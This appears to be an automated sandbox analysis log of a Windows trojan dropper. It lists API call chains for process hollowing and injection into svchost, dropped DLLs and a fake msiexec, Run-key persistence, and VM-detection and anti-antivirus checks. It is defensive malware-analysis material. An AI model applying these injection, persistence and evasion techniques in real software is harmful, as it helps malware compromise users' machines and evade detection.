    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 7_2_00402298 PathCombineA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,7_2_00402298
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_00401284 NtAllocateVirtualMemory,8_2_00401284
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_001E00C0 GetModuleHandleW,VirtualAlloc,GetModuleFileNameW,SetEnvironmentVariableW,GetWindowsDirectoryW,NtQueryInformationProcess,lstrcatW,lstrcatW,CreateFileW,NtCreateSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,CreateProcessW,NtDelayExecution,NtUnmapViewOfSection,NtMapViewOfSection,NtClose,GetThreadContext,NtUnmapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,CloseHandle,VirtualFree,ExitProcess,8_2_001E00C0
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00081284 NtAllocateVirtualMemory,9_2_00081284
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00020973 GetProcessHeap,GetVersionExA,NtQueryInformationProcess,NtDelayExecution,VirtualAlloc,GetEnvironmentVariableW,SetEnvironmentVariableW,GetShortPathNameW,wsprintfA,CreateMutexA,GetLastError,SetFileAttributesW,DeleteFileW,VirtualFree,WSAStartup,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateThread,WaitForSingleObject,CloseHandle,NtDelayExecution,SetFileAttributesW,DeleteFileW,VirtualFree,ExitProcess,SetErrorMode,9_2_00020973
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00022B45 NtDelayExecution,VirtualAlloc,ExpandEnvironmentStringsW,GetTickCount,wsprintfW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,VirtualFree,HeapFree,9_2_00022B45
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00022E82 NtDelayExecution,9_2_00022E82
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00022CBA NtDelayExecution,HeapFree,RtlAllocateHeap,wsprintfA,RtlAllocateHeap,lstrlen,HeapFree,HeapFree,ExitProcess,9_2_00022CBA
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000228B8 NtDelayExecution,VirtualAlloc,GetModuleFileNameW,CreateFileW,GetFileTime,CloseHandle,lstrcpy,RegOpenKeyExA,wsprintfW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetTickCount,wsprintfW,CloseHandle,CreateFileW,WriteFile,SetFileTime,CloseHandle,CreateProcessW,CloseHandle,ResumeThread,CloseHandle,CloseHandle,VirtualFree,HeapFree,9_2_000228B8
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000223DC NtDelayExecution,GetTickCount,wsprintfW,VirtualAlloc,ExpandEnvironmentStringsW,SetCurrentDirectoryW,lstrcatW,CreateFileW,WriteFile,CloseHandle,LoadLibraryW,GetProcAddress,FreeLibrary,wsprintfA,lstrcpy,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,GetSystemDirectoryW,SetCurrentDirectoryW,VirtualFree,HeapFree,9_2_000223DC
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350394202.00000000005ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350389547.00000000005E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350397688.00000000005F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
    Source: Hu25VEa8Dr.exe, 00000004.00000003.350301075.00000000005DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewpdshext.dll.muij% vs Hu25VEa8Dr.exe
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection loaded: gozekeneka.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection loaded: zojemilocan.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeSection loaded: xuxokuxoka.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection loaded: jahulocayedo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection loaded: firozedikami.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeSection loaded: yiduyevutog.dllJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
    Source: Zojemilocan.dll.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: xuxokuxoka.dll.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Jahulocayedo.dll.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Hu25VEa8Dr.exeReversingLabs: Detection: 95%
    Source: Hu25VEa8Dr.exeVirustotal: Detection: 81%
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile read: C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: Hu25VEa8Dr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exeJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171Jump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\nshA6F9.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winEXE@17/19@7/3
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004041FC GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041FC
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_004014F0 _memset,_memset,_memset,_memset,_memset,GetTickCount,OpenMutexW,_memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32NextW,GetTempPathW,CreateDirectoryW,CreateFileW,WriteFile,CloseHandle,ShellExecuteExW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,GetTempPathW,CreateFileW,WriteFile,CloseHandle,ShellExecuteExW,WaitForSingleObject,WaitForSingleObject,FindFirstChangeNotificationW,WaitForSingleObject,FindNextChangeNotification,WaitForSingleObject,GetFileAttributesW,4_2_004014F0
    Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\TLS
    Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\1703032604
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 3_2_00402419 FindResourceA,SizeofResource,LoadResource,LockResource,Sleep,??2@YAPAXI@Z,??_U@YAPAXI@Z,3_2_00402419
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: TLS4_2_004014F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: avp.exe4_2_004014F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: \MSI4_2_004014F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: \msiexec.exe4_2_004014F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: \Temp4_2_004014F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: %USERPROFILE%4_2_004014F0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCommand line argument: .exe4_2_004014F0
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Binary string: T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb source: svchost.exe, svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: T:\ldr\CUSTOM\local\local\Release\ADropper.pdb source: Hu25VEa8Dr.exe, Hu25VEa8Dr.exe, 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: svchost.pdb source: svchost.exe, 00000009.00000002.381614429.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 7.2.msiexec.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 7.2.msiexec.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 8.2.msiexec.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_10003A20 push eax; ret 2_2_10003A4E
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_00403185 push ecx; ret 4_2_00403198
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeCode function: 6_2_10003A20 push eax; ret 6_2_10003A4E
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E5565 push ecx; ret 9_2_001E5578
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001EE1CE push 0000006Ah; retf 9_2_001EE1D0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405D2E
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\ProgramData\Local Settings\Temp\msoiruj.batJump to dropped file
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\ProgramData\Local Settings\Temp\msoiruj.batJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Firozedikami.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\natigezeholi.dllJump to dropped file
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\ProgramData\Local Settings\Temp\msoiruj.batJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\0BBFF.tmpJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeJump to dropped file
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeFile created: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 14108Jump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft 00E35EEEJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: vbox qemu qemu 8_2_0040141C
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: qemu qemu 8_2_004017AF
    Source: C:\Windows\SysWOW64\svchost.exeCode function: vbox qemu qemu 9_2_0008141C
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeRDTSC instruction interceptor: First address: 0000000000401746 second address: 0000000000401749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 rdtsc
